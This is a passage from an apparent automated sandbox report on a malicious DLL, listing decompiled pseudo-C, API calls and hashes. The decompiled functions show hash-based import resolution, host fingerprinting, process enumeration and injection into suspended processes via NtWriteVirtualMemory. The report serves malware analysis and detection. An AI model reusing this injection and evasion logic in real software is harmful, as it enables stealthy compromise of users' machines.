                            				return _t15;
                            			}














                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                            • memset.MSVCRT ref: 1000ABD6
                            • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                            • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                            • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                            • String ID:
                            • API String ID: 1267121359-0
                            • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                            • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 197 1000dfad-1000dfc4 198 1000e021 197->198 199 1000dfc6-1000dfee 197->199 201 1000e023-1000e027 198->201 199->198 200 1000dff0-1000e013 call 1000c379 call 1000d400 199->200 206 1000e015-1000e01f 200->206 207 1000e028-1000e03f 200->207 206->198 206->200 208 1000e041-1000e049 207->208 209 1000e095-1000e097 207->209 208->209 210 1000e04b 208->210 209->201 211 1000e04d-1000e053 210->211 212 1000e063-1000e074 211->212 213 1000e055-1000e057 211->213 215 1000e076-1000e077 212->215 216 1000e079-1000e085 LoadLibraryA 212->216 213->212 214 1000e059-1000e061 213->214 214->211 214->212 215->216 216->198 217 1000e087-1000e091 GetProcAddress 216->217 217->198 218 1000e093 217->218 218->201
                            C-Code - Quality: 100%
                            			E1000DFAD(void* __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v92;
                            				intOrPtr _t41;
                            				signed int _t47;
                            				signed int _t49;
                            				signed int _t51;
                            				void* _t56;
                            				struct HINSTANCE__* _t58;
                            				_Unknown_base(*)()* _t59;
                            				intOrPtr _t60;
                            				void* _t62;
                            				intOrPtr _t63;
                            				void* _t69;
                            				char _t70;
                            				void* _t75;
                            				CHAR* _t80;
                            				void* _t82;
                            
                            				_t75 = __ecx;
                            				_v12 = __edx;
                            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                            				if(_t41 == 0) {
                            					L4:
                            					return 0;
                            				}
                            				_t62 = _t41 + __ecx;
                            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                            				_t47 = 0;
                            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_v8 = 0;
                            				_v16 = _t63;
                            				if(_t63 == 0) {
                            					goto L4;
                            				} else {
                            					goto L2;
                            				}
                            				while(1) {
                            					L2:
                            					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                            					_t51 = _v8;
                            					if((_t49 ^ 0x218fe95b) == _v12) {
                            						break;
                            					}
                            					_t73 = _v20;
                            					_t47 = _t51 + 1;
                            					_v8 = _t47;
                            					if(_t47 < _v16) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                            					return _t80;
                            				} else {
                            					_t56 = 0;
                            					while(1) {
                            						_t70 = _t80[_t56];
                            						if(_t70 == 0x2e || _t70 == 0) {
                            							break;
                            						}
                            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                            						_t56 = _t56 + 1;
                            						if(_t56 < 0x40) {
                            							continue;
                            						}
                            						break;
                            					}
                            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                            					if( *((char*)(_t56 + _t80)) != 0) {
                            						_t80 =  &(( &(_t80[1]))[_t56]);
                            					}
                            					_t40 =  &_v92; // 0x6c6c642e
                            					_t58 = LoadLibraryA(_t40); // executed
                            					if(_t58 == 0) {
                            						goto L4;
                            					}
                            					_t59 = GetProcAddress(_t58, _t80);
                            					if(_t59 == 0) {
                            						goto L4;
                            					}
                            					return _t59;
                            				}
                            			}


                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                            • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E1000B7A8(WCHAR* __ecx, void* __edx) {
                            				long _v8;
                            				long _v12;
                            				WCHAR* _v16;
                            				short _v528;
                            				short _v1040;
                            				short _v1552;
                            				WCHAR* _t27;
                            				signed int _t29;
                            				void* _t33;
                            				long _t38;
                            				WCHAR* _t43;
                            				WCHAR* _t56;
                            
                            				_t44 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t43 = __edx;
                            				_t56 = __ecx;
                            				memset(__edx, 0, 0x100);
                            				_v12 = 0x100;
                            				GetComputerNameW( &_v528,  &_v12);
                            				lstrcpynW(_t43,  &_v528, 0x100);
                            				_t27 = E100095E1(_t44, 0xa88);
                            				_v16 = _t27;
                            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                            				asm("sbb eax, eax");
                            				_v8 = _v8 &  ~_t29;
                            				E100085D5( &_v16);
                            				_t33 = E1000C392(_t43);
                            				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                            				lstrcatW(_t43, _t56);
                            				_t38 = E1000C392(_t43);
                            				_v12 = _t38;
                            				CharUpperBuffW(_t43, _t38);
                            				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
                            			}


                            APIs
                            • memset.MSVCRT ref: 1000B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                            • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                              • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                            • lstrcatW.KERNEL32 ref: 1000B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            • String ID:
                            • API String ID: 3410906232-0
                            • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                            • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 236 1000ca25-1000ca45 call 1000c8fd 239 1000cb73-1000cb76 236->239 240 1000ca4b-1000ca6c call 1000a86d 236->240 243 1000ca72-1000ca74 240->243 244 1000cb63-1000cb72 call 1000861a 240->244 245 1000cb51-1000cb61 call 1000861a 243->245 246 1000ca7a 243->246 244->239 245->244 248 1000ca7d-1000ca7f 246->248 251 1000cb42-1000cb4b 248->251 252 1000ca85-1000ca9b call 1000ae66 248->252 251->243 251->245 256 1000cb00-1000cb04 252->256 257 1000ca9d-1000cab0 call 1000cb77 252->257 258 1000cb06-1000cb08 256->258 259 1000cb2f-1000cb3c 256->259 257->256 264 1000cab2-1000caca 257->264 261 1000cb19-1000cb29 258->261 262 1000cb0a-1000cb10 258->262 259->248 259->251 261->259 262->261 264->256 267 1000cacc-1000cae7 GetLastError ResumeThread 264->267 268 1000cae9-1000caf4 267->268 269 1000cafc-1000cafd CloseHandle 267->269 271 1000caf6 268->271 272 1000caf7 268->272 269->256 271->272 272->269
                            C-Code - Quality: 89%
                            			E1000CA25(intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				void* _v36;
                            				char _v40;
                            				char _v80;
                            				char _t37;
                            				intOrPtr _t38;
                            				void* _t45;
                            				intOrPtr _t47;
                            				intOrPtr _t48;
                            				intOrPtr _t50;
                            				intOrPtr _t52;
                            				void* _t54;
                            				intOrPtr _t57;
                            				long _t61;
                            				intOrPtr _t62;
                            				signed int _t65;
                            				signed int _t68;
                            				signed int _t82;
                            				void* _t85;
                            				char _t86;
                            
                            				_v8 = _v8 & 0x00000000;
                            				_v20 = __edx;
                            				_t65 = 0;
                            				_t37 = E1000C8FD( &_v8);
                            				_t86 = _t37;
                            				_v24 = _t86;
                            				_t87 = _t86;
                            				if(_t86 == 0) {
                            					return _t37;
                            				}
                            				_t38 =  *0x1001e688; // 0x2d90590
                            				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
                            				_t82 = _v8;
                            				_t68 = 0;
                            				_v16 = 0;
                            				if(_t82 == 0) {
                            					L20:
                            					E1000861A( &_v24, 0);
                            					return _t65;
                            				}
                            				while(_t65 == 0) {
                            					while(_t65 == 0) {
                            						asm("stosd");
                            						asm("stosd");
                            						asm("stosd");
                            						asm("stosd");
                            						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                            						_t92 = _t45;
                            						if(_t45 >= 0) {
                            							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
                            							if(_t54 != 0) {
                            								_t57 =  *0x1001e684; // 0x2e0faa0
                            								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                            								if(_t85 != 0) {
                            									GetLastError();
                            									_t61 = ResumeThread(_v36);
                            									_t62 =  *0x1001e684; // 0x2e0faa0
                            									if(_t61 != 0) {
                            										_push(0xea60);
                            										_push(_t85);
                            										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                            											_t65 = _t65 + 1;
                            										}
                            										_t62 =  *0x1001e684; // 0x2e0faa0
                            									}
                            									CloseHandle(_t85);
                            								}
                            							}
                            						}
                            						if(_v40 != 0) {
                            							if(_t65 == 0) {
                            								_t52 =  *0x1001e684; // 0x2e0faa0
                            								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                            							}
                            							_t48 =  *0x1001e684; // 0x2e0faa0
                            							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                            							_t50 =  *0x1001e684; // 0x2e0faa0
                            							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                            						}
                            						_t68 = _v16;
                            						_t47 = _v12 + 1;
                            						_v12 = _t47;
                            						if(_t47 < 2) {
                            							continue;
                            						} else {
                            							break;
                            						}
                            					}
                            					_t82 = _v8;
                            					_t68 = _t68 + 1;
                            					_v16 = _t68;
                            					if(_t68 < _t82) {
                            						continue;
                            					} else {
                            						break;
                            					}
                            					do {
                            						goto L19;
                            					} while (_t82 != 0);
                            					goto L20;
                            				}
                            				L19:
                            				E1000861A(_t86, 0xfffffffe);
                            				_t86 = _t86 + 4;
                            				_t82 = _t82 - 1;
                            			}


                            APIs
                              • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                              • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                              • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                              • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                              • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                            • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                            • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                            • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                            • String ID:
                            • API String ID: 1274669455-0
                            • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                            • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 273 1000b998-1000b9b8 GetTokenInformation 274 1000b9ba-1000b9c3 GetLastError 273->274 275 1000b9fe 273->275 274->275 276 1000b9c5-1000b9d5 call 10008604 274->276 277 1000ba00-1000ba04 275->277 280 1000b9d7-1000b9d9 276->280 281 1000b9db-1000b9ee GetTokenInformation 276->281 280->277 281->275 282 1000b9f0-1000b9fc call 1000861a 281->282 282->280
                            C-Code - Quality: 86%
                            			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _t12;
                            				void* _t20;
                            				void* _t22;
                            				union _TOKEN_INFORMATION_CLASS _t28;
                            				void* _t31;
                            
                            				_push(_t22);
                            				_push(_t22);
                            				_t31 = 0;
                            				_t28 = __edx;
                            				_t20 = _t22;
                            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                            					L6:
                            					_t12 = _t31;
                            				} else {
                            					_t31 = E10008604(_v8);
                            					_v12 = _t31;
                            					if(_t31 != 0) {
                            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                            							goto L6;
                            						} else {
                            							E1000861A( &_v12, _t16);
                            							goto L3;
                            						}
                            					} else {
                            						L3:
                            						_t12 = 0;
                            					}
                            				}
                            				return _t12;
                            			}


                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                            • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocErrorHeapLast
                            • String ID:
                            • API String ID: 4258577378-0
                            • Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                            • Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 285 1000ae66-1000aeb3 memset CreateProcessW
                            C-Code - Quality: 47%
                            			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                            				struct _STARTUPINFOW _v72;
                            				signed int _t11;
                            				WCHAR* _t15;
                            				int _t19;
                            				struct _PROCESS_INFORMATION* _t20;
                            
                            				_t20 = __edx;
                            				_t15 = __ecx;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t19 = 0x44;
                            				memset( &_v72, 0, _t19);
                            				_v72.cb = _t19;
                            				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                            				asm("sbb eax, eax");
                            				return  ~( ~_t11) - 1;
                            			}


                            APIs
                            • memset.MSVCRT ref: 1000AE85
                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateProcessmemset
                            • String ID:
                            • API String ID: 2296119082-0
                            • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                            • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 47%
                            			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                            				char _v8;
                            				char _t5;
                            				struct HINSTANCE__* _t7;
                            				void* _t10;
                            				void* _t12;
                            				void* _t22;
                            				void* _t25;
                            
                            				_push(__ecx);
                            				_t12 = __ecx;
                            				_t22 = __edx;
                            				_t5 = E100095C7(_a4);
                            				_t25 = 0;
                            				_v8 = _t5;
                            				_push(_t5);
                            				if(_a4 != 0x7c3) {
                            					_t7 = LoadLibraryA(); // executed
                            				} else {
                            					_t7 = GetModuleHandleA();
                            				}
                            				if(_t7 != 0) {
                            					_t10 = E1000E171(_t12, _t22, _t7); // executed
                            					_t25 = _t10;
                            				}
                            				E100085C2( &_v8);
                            				return _t25;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
                            • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 298 1000ccc0-1000ccce 299 1000ccd0-1000ccd1 298->299 300 1000cd1f-1000cd32 Sleep 298->300 301 1000ccd3-1000ccdf 299->301 302 1000cce1-1000cce7 301->302 303 1000cd15-1000cd1c 301->303 304 1000ccea-1000ccff lstrcmpiA 302->304 303->301 305 1000cd1e 303->305 306 1000cd10-1000cd13 304->306 307 1000cd01-1000cd0c 304->307 305->300 306->303 307->304 308 1000cd0e 307->308 308->303
                            C-Code - Quality: 100%
                            			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
                            				CHAR* _v8;
                            				int _t28;
                            				signed int _t31;
                            				signed int _t34;
                            				signed int _t35;
                            				void* _t38;
                            				signed int* _t41;
                            
                            				_t41 = _a8;
                            				_t31 = 0;
                            				if(_t41[1] > 0) {
                            					_t38 = 0;
                            					do {
                            						_t3 =  &(_t41[2]); // 0xe6840d8b
                            						_t34 =  *_t3;
                            						_t35 = 0;
                            						_a8 = 0;
                            						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                            							_v8 = _a4 + 0x24;
                            							while(1) {
                            								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                            								_t14 =  &(_t41[2]); // 0xe6840d8b
                            								_t34 =  *_t14;
                            								if(_t28 == 0) {
                            									break;
                            								}
                            								_t35 = _a8 + 1;
                            								_a8 = _t35;
                            								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                            									continue;
                            								} else {
                            								}
                            								goto L8;
                            							}
                            							 *_t41 =  *_t41 |  *(_t34 + _t38);
                            						}
                            						L8:
                            						_t31 = _t31 + 1;
                            						_t38 = _t38 + 0x10;
                            						_t20 =  &(_t41[1]); // 0x1374ff85
                            					} while (_t31 <  *_t20);
                            				}
                            				Sleep(0xa);
                            				return 1;
                            			}

                            APIs
                            • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                            • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleeplstrcmpi
                            • String ID:
                            • API String ID: 1261054337-0
                            • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                            • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                            • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 309 10005e96-10005eb5 ExitProcess
                            C-Code - Quality: 100%
                            			E10005E96() {
                            				intOrPtr _t3;
                            
                            				_t3 =  *0x1001e684; // 0x2e0faa0
                            				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                            				ExitProcess(0);
                            			}

                            APIs
                            • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                            • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                            • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 311 100085ef-10008603 HeapCreate
                            C-Code - Quality: 100%
                            			E100085EF() {
                            				void* _t1;
                            
                            				_t1 = HeapCreate(0, 0x80000, 0); // executed
                            				 *0x1001e768 = _t1;
                            				return _t1;
                            			}

                            APIs
                            • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateHeap
                            • String ID:
                            • API String ID: 10892065-0
                            • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                            • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                            • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E1000BA62(void* __ecx, void* __esi) {
                            				intOrPtr* _v8;
                            				char _v12;
                            				void* _v16;
                            				char _v20;
                            				char _v24;
                            				short _v28;
                            				char _v32;
                            				void* _t20;
                            				intOrPtr* _t21;
                            				intOrPtr _t29;
                            				intOrPtr _t31;
                            				intOrPtr* _t33;
                            				intOrPtr _t34;
                            				char _t37;
                            				union _TOKEN_INFORMATION_CLASS _t44;
                            				char _t45;
                            				intOrPtr* _t48;
                            
                            				_t37 = 0;
                            				_v28 = 0x500;
                            				_t45 = 0;
                            				_v32 = 0;
                            				_t20 = E1000B946(__ecx);
                            				_v16 = _t20;
                            				if(_t20 != 0) {
                            					_push( &_v24);
                            					_t44 = 2;
                            					_t21 = E1000B998(_t44); // executed
                            					_t48 = _t21;
                            					_v20 = _t48;
                            					if(_t48 == 0) {
                            						L10:
                            						CloseHandle(_v16);
                            						if(_t48 != 0) {
                            							E1000861A( &_v20, _t37);
                            						}
                            						return _t45;
                            					}
                            					_push( &_v12);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0x220);
                            					_push(0x20);
                            					_push(2);
                            					_push( &_v32);
                            					_t29 =  *0x1001e68c; // 0x2e0fc68
                            					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                            						goto L10;
                            					}
                            					if( *_t48 <= 0) {
                            						L9:
                            						_t31 =  *0x1001e68c; // 0x2e0fc68
                            						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                            						_t37 = 0;
                            						goto L10;
                            					}
                            					_t9 = _t48 + 4; // 0x4
